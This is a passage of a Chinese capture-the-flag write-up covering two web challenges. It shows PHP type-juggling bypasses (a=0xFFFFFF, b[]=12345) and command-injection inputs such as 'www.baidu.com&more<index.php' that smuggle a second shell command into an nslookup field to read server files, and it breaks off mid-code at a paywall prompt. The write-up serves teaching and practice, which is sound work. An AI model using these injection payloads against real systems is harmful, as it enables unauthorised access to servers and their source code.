Disal
打开页面没有有用信息,查看robots.txt发现f1ag.php,访问查看源代码:
<?php
show_source(__FILE__);
include("flag_is_so_beautiful.php");
$a=@$_POST['a'];
$key=@preg_match('/[a-zA-Z]{6}/',$a);
$b=@$_REQUEST['b'];
if($a>999999 and $key){
echo $flag1;
}
if(is_numeric($b)){
exit();
}
if($b>1234){
echo $flag2;
}
?> 这里要求a>999999且a的值为字母恰好出现六次。用十六进制编码绕过。令a=0xFFFFFF
b使用数组绕过。令b[]=12345。拿到flag
shxpl
页面是一个nslookup 工具
经过测试发现过滤参数很多
可用more查看文件,dir查看目录
www.baidu.com&dir看到源代码index.php
www.baidu.com&more<index.php拿到源码关键部分:
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$domain = $_P
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
